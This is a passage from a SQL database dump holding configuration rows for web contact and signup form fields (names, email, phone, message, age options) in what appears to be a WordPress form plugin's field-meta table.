Name'),(13791,446,'field_key','firstname','field_key','firstname'),(13792,446,'custom_name_attribute','fname','custom_name_attribute','fname'),(13793,446,'personally_identifiable','1','personally_identifiable','1'),(13794,446,'value','','value',''),(13795,446,'parent_id','44','parent_id','44'),(13796,447,'objectType','Field','objectType','Field'),(13797,447,'objectDomain','fields','objectDomain','fields'),(13798,447,'editActive','','editActive',''),(13799,447,'order','4','order','4'),(13800,447,'idAttribute','id','idAttribute','id'),(13801,447,'label','Last Name','label','Last Name'),(13802,447,'key','lastname','key','lastname'),(13803,447,'type','lastname','type','lastname'),(13804,447,'created_at','2016-08-28 16:16:05','created_at','2016-08-28 16:16:05'),(13805,447,'label_pos','default','label_pos','default'),(13806,447,'required','1','required','1'),(13807,447,'default','','default',''),(13808,447,'placeholder','','placeholder',''),(13809,447,'container_class','','container_class',''),(13810,447,'element_class','','element_class',''),(13811,447,'admin_label','','admin_label',''),(13812,447,'help_text','','help_text',''),(13813,447,'desc_text','','desc_text',''),(13814,447,'field_label','Last Name','field_label','Last Name'),(13815,447,'field_key','lastname','field_key','lastname'),(13816,447,'custom_name_attribute','lname','custom_name_attribute','lname'),(13817,447,'personally_identifiable','1','personally_identifiable','1'),(13818,447,'value','','value',''),(13819,447,'drawerDisabled','','drawerDisabled',''),(13820,447,'parent_id','44','parent_id','44'),(13821,448,'objectType','Field','objectType','Field'),(13822,448,'objectDomain','fields','objectDomain','fields'),(13823,448,'editActive','','editActive',''),(13824,448,'order','5','order','5'),(13825,448,'idAttribute','id','idAttribute','id'),(13826,448,'label','Email','label','Email'),(13827,448,'key','email','key','email'),(13828,448,'type','email','type','email'),(13829,448,'created_at','2016-08-28 16:16:05','created_at','2016-08-28 16:16:05'),(13830,448,'label_pos','default','label_pos','default'),(13831,448,'required','1','required','1'),(13832,448,'default','','default',''),(13833,448,'placeholder','','placeholder',''),(13834,448,'container_class','one-half first','container_class','one-half first'),(13835,448,'element_class','','element_class',''),(13836,448,'admin_label','','admin_label',''),(13837,448,'help_text','','help_text',''),(13838,448,'desc_text','','desc_text',''),(13839,448,'field_label','Email','field_label','Email'),(13840,448,'field_key','email','field_key','email'),(13841,448,'custom_name_attribute','email','custom_name_attribute','email'),(13842,448,'personally_identifiable','1','personally_identifiable','1'),(13843,448,'value','','value',''),(13844,448,'parent_id','44','parent_id','44'),(13845,449,'drawerDisabled','','drawerDisabled',''),(13846,449,'objectType','Field','objectType','Field'),(13847,449,'objectDomain','fields','objectDomain','fields'),(13848,449,'editActive','','editActive',''),(13849,449,'order','9','order','9'),(13850,449,'idAttribute','id','idAttribute','id'),(13851,449,'label','Submit','label','Submit'),(13852,449,'key','submit_1618628929218','key','submit_1618628929218'),(13853,449,'type','submit','type','submit'),(13854,449,'created_at','2016-08-28 16:16:05','created_at','2016-08-28 16:16:05'),(13855,449,'processing_label','Processing','processing_label','Processing'),(13856,449,'container_class','','container_class',''),(13857,449,'element_class','','element_class',''),(13858,449,'field_label','Submit','field_label','Submit'),(13859,449,'field_key','submit_1618628929218','field_key','submit_1618628929218'),(13860,449,'parent_id','44','parent_id','44'),(13861,450,'objectType','Field','objectType','Field'),(13862,450,'objectDomain','fields','objectDomain','fields'),(13863,450,'editActive','','editActive',''),(13864,450,'order','1','order','1'),(13865,450,'type','textbox','type','textbox'),(13866,450,'fav_id','','fav_id',''),(13867,450,'def_id','6','def_id','6'),(13868,450,'label','First Name','label','First Name'),(13869,450,'label_pos','above','label_pos','above'),(13870,450,'mask','','mask',''),(13871,450,'datepicker','0','datepicker','0'),(13872,450,'first_name','1','first_name','1'),(13873,450,'last_name','0','last_name','0'),(13874,450,'from_name','0','from_name','0'),(13875,450,'user_info_field_group','1','user_info_field_group','1'),(13876,450,'show_help','0','show_help','0'),(13877,450,'help_text','','help_text',''),(13878,450,'calc_auto_include','0','calc_auto_include','0'),(13879,450,'calc_option','0','calc_option','0'),(13880,450,'placeholder','','placeholder',''),(13881,450,'user_address_1','','user_address_1',''),(13882,450,'user_address_2','','user_address_2',''),(13883,450,'user_city','','user_city',''),(13884,450,'user_zip','','user_zip',''),(13885,450,'user_phone','','user_phone',''),(13886,450,'user_email','','user_email',''),(13887,450,'disable_input','0','disable_input','0'),(13888,450,'input_limit','','input_limit',''),(13889,450,'input_limit_type','char','input_limit_type','char'),(13890,450,'input_limit_msg','','input_limit_msg',''),(13891,450,'user_state','0','user_state','0'),(13892,450,'autocomplete_off','0','autocomplete_off','0'),(13893,450,'num_sort','0','num_sort','0'),(13894,450,'admin_label','','admin_label',''),(13895,450,'user_info_field_group_name','','user_info_field_group_name',''),(13896,450,'user_info_field_group_custom','','user_info_field_group_custom',''),(13897,450,'show_desc','0','show_desc','0'),(13898,450,'desc_pos','none','desc_pos','none'),(13899,450,'desc_text','','desc_text',''),(13900,450,'element_class','','element_class',''),(13901,450,'required','1','required','1'),(13902,450,'key','textbox_268','key','textbox_268'),(13903,450,'field_label','First Name','field_label','First Name'),(13904,450,'field_key','textbox_268','field_key','textbox_268'),(13905,450,'default','','default',''),(13906,450,'container_class','one-half first','container_class','one-half first'),(13907,450,'manual_key','','manual_key',''),(13908,450,'custom_mask','','custom_mask',''),(13909,450,'custom_name_attribute','','custom_name_attribute',''),(13910,450,'personally_identifiable','','personally_identifiable',''),(13911,450,'value','','value',''),(13912,450,'parent_id','35','parent_id','35'),(13913,450,'idAttribute','id','idAttribute','id'),(13914,451,'objectType','Field','objectType','Field'),(13915,451,'objectDomain','fields','objectDomain','fields'),(13916,451,'editActive','','editActive',''),(13917,451,'order','2','order','2'),(13918,451,'type','lastname','type','lastname'),(13919,451,'fav_id','','fav_id',''),(13920,451,'def_id','7','def_id','7'),(13921,451,'label','Last Name','label','Last Name'),(13922,451,'label_pos','above','label_pos','above'),(13923,451,'mask','','mask',''),(13924,451,'datepicker','0','datepicker','0'),(13925,451,'first_name','0','first_name','0'),(13926,451,'from_name','0','from_name','0'),(13927,451,'user_info_field_group','1','user_info_field_group','1'),(13928,451,'show_help','0','show_help','0'),(13929,451,'help_text','','help_text',''),(13930,451,'calc_auto_include','0','calc_auto_include','0'),(13931,451,'calc_option','0','calc_option','0'),(13932,451,'placeholder','','placeholder',''),(13933,451,'user_address_1','','user_address_1',''),(13934,451,'user_address_2','','user_address_2',''),(13935,451,'user_city','','user_city',''),(13936,451,'user_zip','','user_zip',''),(13937,451,'user_phone','','user_phone',''),(13938,451,'user_email','','user_email',''),(13939,451,'disable_input','0','disable_input','0'),(13940,451,'input_limit','','input_limit',''),(13941,451,'input_limit_type','char','input_limit_type','char'),(13942,451,'input_limit_msg','','input_limit_msg',''),(13943,451,'user_state','0','user_state','0'),(13944,451,'autocomplete_off','0','autocomplete_off','0'),(13945,451,'num_sort','0','num_sort','0'),(13946,451,'admin_label','','admin_label',''),(13947,451,'user_info_field_group_name','','user_info_field_group_name',''),(13948,451,'user_info_field_group_custom','','user_info_field_group_custom',''),(13949,451,'show_desc','0','show_desc','0'),(13950,451,'desc_pos','none','desc_pos','none'),(13951,451,'desc_text','','desc_text',''),(13952,451,'element_class','','element_class',''),(13953,451,'required','1','required','1'),(13954,451,'key','lastname_269','key','lastname_269'),(13955,451,'field_label','Last Name','field_label','Last Name'),(13956,451,'field_key','lastname_269','field_key','lastname_269'),(13957,451,'default','','default',''),(13958,451,'container_class','one-half','container_class','one-half'),(13959,451,'custom_name_attribute','lname','custom_name_attribute','lname'),(13960,451,'personally_identifiable','1','personally_identifiable','1'),(13961,451,'value','','value',''),(13962,451,'parent_id','35','parent_id','35'),(13963,451,'drawerDisabled','','drawerDisabled',''),(13964,451,'idAttribute','id','idAttribute','id'),(13965,452,'objectType','Field','objectType','Field'),(13966,452,'objectDomain','fields','objectDomain','fields'),(13967,452,'editActive','','editActive',''),(13968,452,'order','4','order','4'),(13969,452,'type','email','type','email'),(13970,452,'fav_id','','fav_id',''),(13971,452,'def_id','14','def_id','14'),(13972,452,'label','Email','label','Email'),(13973,452,'label_pos','above','label_pos','above'),(13974,452,'mask','','mask',''),(13975,452,'datepicker','0','datepicker','0'),(13976,452,'first_name','0','first_name','0'),(13977,452,'last_name','0','last_name','0'),(13978,452,'from_name','0','from_name','0'),(13979,452,'user_address_1','0','user_address_1','0'),(13980,452,'user_address_2','0','user_address_2','0'),(13981,452,'user_city','0','user_city','0'),(13982,452,'user_zip','0','user_zip','0'),(13983,452,'user_phone','0','user_phone','0'),(13984,452,'user_info_field_group','1','user_info_field_group','1'),(13985,452,'show_help','0','show_help','0'),(13986,452,'help_text','','help_text',''),(13987,452,'calc_auto_include','0','calc_auto_include','0'),(13988,452,'calc_option','0','calc_option','0'),(13989,452,'placeholder','','placeholder',''),(13990,452,'disable_input','0','disable_input','0'),(13991,452,'input_limit','','input_limit',''),(13992,452,'input_limit_type','char','input_limit_type','char'),(13993,452,'input_limit_msg','','input_limit_msg',''),(13994,452,'user_state','0','user_state','0'),(13995,452,'autocomplete_off','0','autocomplete_off','0'),(13996,452,'num_sort','0','num_sort','0'),(13997,452,'admin_label','','admin_label',''),(13998,452,'user_info_field_group_name','','user_info_field_group_name',''),(13999,452,'user_info_field_group_custom','','user_info_field_group_custom',''),(14000,452,'show_desc','0','show_desc','0'),(14001,452,'desc_pos','none','desc_pos','none'),(14002,452,'desc_text','','desc_text',''),(14003,452,'element_class','','element_class',''),(14004,452,'required','1','required','1'),(14005,452,'key','email_270','key','email_270'),(14006,452,'field_label','Email','field_label','Email'),(14007,452,'field_key','email_270','field_key','email_270'),(14008,452,'default','','default',''),(14009,452,'container_class','one-half','container_class','one-half'),(14010,452,'custom_name_attribute','email','custom_name_attribute','email'),(14011,452,'personally_identifiable','1','personally_identifiable','1'),(14012,452,'value','','value',''),(14013,452,'parent_id','35','parent_id','35'),(14014,452,'drawerDisabled','','drawerDisabled',''),(14015,452,'idAttribute','id','idAttribute','id'),(14016,453,'objectType','Field','objectType','Field'),(14017,453,'objectDomain','fields','objectDomain','fields'),(14018,453,'editActive','','editActive',''),(14019,453,'order','5','order','5'),(14020,453,'type','textbox','type','textbox'),(14021,453,'fav_id','','fav_id',''),(14022,453,'def_id','','def_id',''),(14023,453,'label','Message Subject','label','Message Subject'),(14024,453,'input_limit_msg','character(s) left','input_limit_msg','character(s) left'),(14025,453,'label_pos','above','label_pos','above'),(14026,453,'placeholder','','placeholder',''),(14027,453,'first_name','','first_name',''),(14028,453,'last_name','','last_name',''),(14029,453,'user_address_1','','user_address_1',''),(14030,453,'user_address_2','','user_address_2',''),(14031,453,'user_city','','user_city',''),(14032,453,'user_zip','','user_zip',''),(14033,453,'user_phone','','user_phone',''),(14034,453,'user_email','','user_email',''),(14035,453,'user_info_field_group','1','user_info_field_group','1'),(14036,453,'disable_input','0','disable_input','0'),(14037,453,'mask','','mask',''),(14038,453,'input_limit','','input_limit',''),(14039,453,'input_limit_type','char','input_limit_type','char'),(14040,453,'calc_auto_include','0','calc_auto_include','0'),(14041,453,'datepicker','0','datepicker','0'),(14042,453,'user_state','0','user_state','0'),(14043,453,'autocomplete_off','0','autocomplete_off','0'),(14044,453,'num_sort','0','num_sort','0'),(14045,453,'admin_label','','admin_label',''),(14046,453,'user_info_field_group_name','','user_info_field_group_name',''),(14047,453,'user_info_field_group_custom','','user_info_field_group_custom',''),(14048,453,'show_help','0','show_help','0'),(14049,453,'help_text','','help_text',''),(14050,453,'show_desc','0','show_desc','0'),(14051,453,'desc_pos','none','desc_pos','none'),(14052,453,'desc_text','','desc_text',''),(14053,453,'element_class','','element_class',''),(14054,453,'required','1','required','1'),(14055,453,'key','textbox_303','key','textbox_303'),(14056,453,'field_label','Message Subject','field_label','Message Subject'),(14057,453,'field_key','textbox_303','field_key','textbox_303'),(14058,453,'default','','default',''),(14059,453,'container_class','','container_class',''),(14060,453,'manual_key','','manual_key',''),(14061,453,'custom_mask','','custom_mask',''),(14062,453,'custom_name_attribute','','custom_name_attribute',''),(14063,453,'personally_identifiable','','personally_identifiable',''),(14064,453,'value','','value',''),(14065,453,'parent_id','35','parent_id','35'),(14066,453,'idAttribute','id','idAttribute','id'),(14067,454,'objectType','Field','objectType','Field'),(14068,454,'objectDomain','fields','objectDomain','fields'),(14069,454,'editActive','','editActive',''),(14070,454,'order','6','order','6'),(14071,454,'type','textarea','type','textarea'),(14072,454,'fav_id','','fav_id',''),(14073,454,'def_id','','def_id',''),(14074,454,'label','Please Enter Your Message Here','label','Please Enter Your Message Here'),(14075,454,'input_limit_msg','character(s) left','input_limit_msg','character(s) left'),(14076,454,'label_pos','above','label_pos','above'),(14077,454,'default_value','','default_value',''),(14078,454,'textarea_rte','0','textarea_rte','0'),(14079,454,'textarea_media','0','textarea_media','0'),(14080,454,'disable_rte_mobile','0','disable_rte_mobile','0'),(14081,454,'input_limit','','input_limit',''),(14082,454,'input_limit_type','char','input_limit_type','char'),(14083,454,'calc_auto_include','0','calc_auto_include','0'),(14084,454,'num_sort','0','num_sort','0'),(14085,454,'admin_label','','admin_label',''),(14086,454,'show_help','0','show_help','0'),(14087,454,'help_text','','help_text',''),(14088,454,'show_desc','0','show_desc','0'),(14089,454,'desc_pos','none','desc_pos','none'),(14090,454,'desc_text','','desc_text',''),(14091,454,'element_class','','element_class',''),(14092,454,'required','1','required','1'),(14093,454,'default','','default',''),(14094,454,'key','please_enter_your_message_here_1599585729237','key','please_enter_your_message_here_1599585729237'),(14095,454,'field_label','Please Enter Your Message Here','field_label','Please Enter Your Message Here'),(14096,454,'field_key','please_enter_your_message_here_1599585729237','field_key','please_enter_your_message_here_1599585729237'),(14097,454,'placeholder','','placeholder',''),(14098,454,'container_class','','container_class',''),(14099,454,'manual_key','','manual_key',''),(14100,454,'value','','value',''),(14101,454,'parent_id','35','parent_id','35'),(14102,454,'drawerDisabled','','drawerDisabled',''),(14103,454,'idAttribute','id','idAttribute','id'),(14104,455,'objectType','Field','objectType','Field'),(14105,455,'objectDomain','fields','objectDomain','fields'),(14106,455,'editActive','','editActive',''),(14107,455,'order','7','order','7'),(14108,455,'type','html','type','html'),(14109,455,'fav_id','','fav_id',''),(14110,455,'def_id','','def_id',''),(14111,455,'label','Text','label','Text'),(14112,455,'input_limit_msg','character(s) left','input_limit_msg','character(s) left'),(14113,455,'default_value','Your email address and other information will not be shared with any third parties for any reason. It will only be used to respond to your request.','default_value','Your email address and other information will not be shared with any third parties for any reason. It will only be used to respond to your request.'),(14114,455,'desc_el','div','desc_el','div'),(14115,455,'show_desc','0','show_desc','0'),(14116,455,'desc_pos','none','desc_pos','none'),(14117,455,'desc_text','','desc_text',''),(14118,455,'element_class','','element_class',''),(14119,455,'default','<div align=\"left\"><b>Your email address and other information will not be shared with any third parties for any reason. It will only be used to respond to your request.</b></div>','default','<div align=\"left\"><b>Your email address and other information will not be shared with any third parties for any reason. It will only be used to respond to your request.</b></div>'),(14120,455,'key','html_305','key','html_305'),(14121,455,'field_label','Text','field_label','Text'),(14122,455,'field_key','html_305','field_key','html_305'),(14123,455,'container_class','','container_class',''),(14124,455,'parent_id','35','parent_id','35'),(14125,455,'drawerDisabled','','drawerDisabled',''),(14126,455,'idAttribute','id','idAttribute','id'),(17052,600,'container_class','one-third first','container_class','one-third first'),(17051,600,'default','','default',''),(17050,600,'field_key','textbox_268','field_key','textbox_268'),(17049,600,'field_label','First Name','field_label','First Name'),(17048,599,'idAttribute','id','idAttribute','id'),(17460,620,'type','html','type','html'),(17047,599,'parent_id','13','parent_id','13'),(17458,620,'idAttribute','id','idAttribute','id'),(17459,620,'label','HTML','label','HTML'),(17457,620,'order','17','order','17'),(17456,620,'editActive','','editActive',''),(17455,619,'drawerDisabled','','drawerDisabled',''),(17452,619,'container_class','','container_class',''),(17453,619,'element_class','','element_class',''),(17454,619,'key','html_1663797745321','key','html_1663797745321'),(14150,457,'objectType','Field','objectType','Field'),(14151,457,'objectDomain','fields','objectDomain','fields'),(14152,457,'editActive','','editActive',''),(14153,457,'order','9','order','9'),(14154,457,'type','submit','type','submit'),(14155,457,'fav_id','','fav_id',''),(14156,457,'def_id','','def_id',''),(14157,457,'label','Submit','label','Submit'),(14158,457,'input_limit_msg','character(s) left','input_limit_msg','character(s) left'),(14159,457,'show_help','0','show_help','0'),(14160,457,'help_text','','help_text',''),(14161,457,'show_desc','0','show_desc','0'),(14162,457,'desc_pos','none','desc_pos','none'),(14163,457,'desc_text','','desc_text',''),(14164,457,'processing_label','Processing','processing_label','Processing'),(14165,457,'element_class','','element_class',''),(14166,457,'key','submit_278','key','submit_278'),(14167,457,'field_label','Submit','field_label','Submit'),(14168,457,'field_key','submit_278','field_key','submit_278'),(14169,457,'container_class','','container_class',''),(14170,457,'parent_id','35','parent_id','35'),(14171,457,'idAttribute','id','idAttribute','id'),(14172,458,'drawerDisabled','','drawerDisabled',''),(14173,458,'mask','','mask',''),(14174,458,'custom_mask','','custom_mask',''),(14175,458,'custom_name_attribute','phone','custom_name_attribute','phone'),(14176,458,'personally_identifiable','1','personally_identifiable','1'),(14177,458,'value','','value',''),(14178,458,'help_text','','help_text',''),(14179,458,'admin_label','','admin_label',''),(14180,458,'manual_key','','manual_key',''),(14181,458,'type','phone','type','phone'),(14182,458,'key','phone_1599585699152','key','phone_1599585699152'),(14183,458,'label_pos','default','label_pos','default'),(14184,458,'required','1','required','1'),(14185,458,'default','','default',''),(14186,458,'placeholder','','placeholder',''),(14187,458,'container_class','one-half first','container_class','one-half first'),(14188,458,'element_class','','element_class',''),(14189,458,'input_limit','','input_limit',''),(14190,458,'input_limit_type','characters','input_limit_type','characters'),(14191,458,'input_limit_msg','Character(s) left','input_limit_msg','Character(s) left'),(14192,458,'label','Phone','label','Phone'),(14193,458,'editActive','','editActive',''),(14194,458,'order','3','order','3'),(14195,458,'idAttribute','id','idAttribute','id'),(14196,458,'field_label','Phone','field_label','Phone'),(14197,458,'field_key','phone_1599585699152','field_key','phone_1599585699152'),(14198,459,'objectType','Field','objectType','Field'),(14199,459,'objectDomain','fields','objectDomain','fields'),(14200,459,'editActive','','editActive',''),(14201,459,'order','1','order','1'),(14202,459,'type','firstname','type','firstname'),(14203,459,'label','First Name','label','First Name'),(14204,459,'key','firstname_1523910710496','key','firstname_1523910710496'),(14205,459,'label_pos','default','label_pos','default'),(14206,459,'required','','required',''),(14207,459,'default','','default',''),(14208,459,'placeholder','','placeholder',''),(14209,459,'container_class','one-half first','container_class','one-half first'),(14210,459,'element_class','','element_class',''),(14211,459,'admin_label','','admin_label',''),(14212,459,'help_text','','help_text',''),(14213,459,'custom_name_attribute','fname','custom_name_attribute','fname'),(14214,459,'parent_id','50','parent_id','50'),(14215,460,'objectType','Field','objectType','Field'),(14216,460,'objectDomain','fields','objectDomain','fields'),(14217,460,'editActive','','editActive',''),(14218,460,'order','2','order','2'),(14219,460,'type','lastname','type','lastname'),(14220,460,'label','Last Name','label','Last Name'),(14221,460,'key','lastname_1523910710972','key','lastname_1523910710972'),(14222,460,'label_pos','default','label_pos','default'),(14223,460,'required','','required',''),(14224,460,'default','','default',''),(14225,460,'placeholder','','placeholder',''),(14226,460,'container_class','one-half second','container_class','one-half second'),(14227,460,'element_class','','element_class',''),(14228,460,'admin_label','','admin_label',''),(14229,460,'help_text','','help_text',''),(14230,460,'custom_name_attribute','lname','custom_name_attribute','lname'),(14231,460,'drawerDisabled','','drawerDisabled',''),(14232,460,'parent_id','50','parent_id','50'),(14233,461,'objectType','Field','objectType','Field'),(14234,461,'objectDomain','fields','objectDomain','fields'),(14235,461,'editActive','','editActive',''),(14236,461,'order','3','order','3'),(14237,461,'label','Email','label','Email'),(14238,461,'type','email','type','email'),(14239,461,'key','email_1523910925640','key','email_1523910925640'),(14240,461,'label_pos','default','label_pos','default'),(14241,461,'required','','required',''),(14242,461,'default','','default',''),(14243,461,'placeholder','','placeholder',''),(14244,461,'container_class','','container_class',''),(14245,461,'element_class','','element_class',''),(14246,461,'admin_label','','admin_label',''),(14247,461,'help_text','','help_text',''),(14248,461,'custom_name_attribute','email','custom_name_attribute','email'),(14249,461,'parent_id','50','parent_id','50'),(14250,462,'objectType','Field','objectType','Field'),(14251,462,'objectDomain','fields','objectDomain','fields'),(14252,462,'editActive','','editActive',''),(14253,462,'order','4','order','4'),(14254,462,'type','confirm','type','confirm'),(14255,462,'label','Email Confirmation','label','Email Confirmation'),(14256,462,'key','email_confirmation_1523911122242','key','email_confirmation_1523911122242'),(14257,462,'label_pos','default','label_pos','default'),(14258,462,'required','','required',''),(14259,462,'default','','default',''),(14260,462,'placeholder','','placeholder',''),(14261,462,'container_class','','container_class',''),(14262,462,'element_class','','element_class',''),(14263,462,'input_limit','','input_limit',''),(14264,462,'input_limit_type','characters','input_limit_type','characters'),(14265,462,'input_limit_msg','Character(s) left','input_limit_msg','Character(s) left'),(14266,462,'manual_key','','manual_key',''),(14267,462,'admin_label','','admin_label',''),(14268,462,'help_text','','help_text',''),(14269,462,'confirm_field','email_1523910925640','confirm_field','email_1523910925640'),(14270,462,'drawerDisabled','','drawerDisabled',''),(14271,462,'parent_id','50','parent_id','50'),(14272,463,'objectType','Field','objectType','Field'),(14273,463,'objectDomain','fields','objectDomain','fields'),(14274,463,'editActive','','editActive',''),(14275,463,'order','5','order','5'),(14276,463,'label','Gender Identification','label','Gender Identification'),(14277,463,'type','textbox','type','textbox'),(14278,463,'key','gender_identification_1523910801816','key','gender_identification_1523910801816'),(14279,463,'label_pos','default','label_pos','default'),(14280,463,'required','','required',''),(14281,463,'default','','default',''),(14282,463,'placeholder','','placeholder',''),(14283,463,'container_class','','container_class',''),(14284,463,'element_class','','element_class',''),(14285,463,'input_limit','','input_limit',''),(14286,463,'input_limit_type','characters','input_limit_type','characters'),(14287,463,'input_limit_msg','Character(s) left','input_limit_msg','Character(s) left'),(14288,463,'manual_key','','manual_key',''),(14289,463,'admin_label','','admin_label',''),(14290,463,'help_text','','help_text',''),(14291,463,'mask','','mask',''),(14292,463,'custom_mask','','custom_mask',''),(14293,463,'custom_name_attribute','','custom_name_attribute',''),(14294,463,'drawerDisabled','','drawerDisabled',''),(14295,463,'parent_id','50','parent_id','50'),(14296,464,'objectType','Field','objectType','Field'),(14297,464,'objectDomain','fields','objectDomain','fields'),(14298,464,'editActive','','editActive',''),(14299,464,'order','6','order','6'),(14300,464,'type','listradio','type','listradio'),(14301,464,'label','Age','label','Age'),(14302,464,'key','age_1523910843594','key','age_1523910843594'),(14303,464,'label_pos','default','label_pos','default'),(14304,464,'required','','required',''),(14305,464,'options','a:3:{i:0;a:9:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:5:\"18-30\";s:5:\"value\";s:5:\"18-30\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:12:\"manual_value\";b:1;}i:1;a:9:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:5:\"31-49\";s:5:\"value\";s:5:\"31-49\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:12:\"manual_value\";b:1;}i:2;a:9:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:3:\"49+\";s:5:\"value\";s:2:\"49\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:12:\"manual_value\";b:1;}}','options','a:3:{i:0;a:9:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:5:\"18-30\";s:5:\"value\";s:5:\"18-30\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons 